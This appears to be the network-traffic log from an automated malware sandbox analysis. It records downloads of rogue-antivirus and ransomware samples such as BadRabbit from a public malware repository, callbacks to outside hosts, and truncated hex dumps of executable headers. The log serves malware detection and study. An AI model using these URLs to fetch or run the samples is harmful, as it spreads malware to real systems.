          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scripts/status.php?action=renew&id=0 HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:06 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:06 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:07 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:12 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:12 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:46:13 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 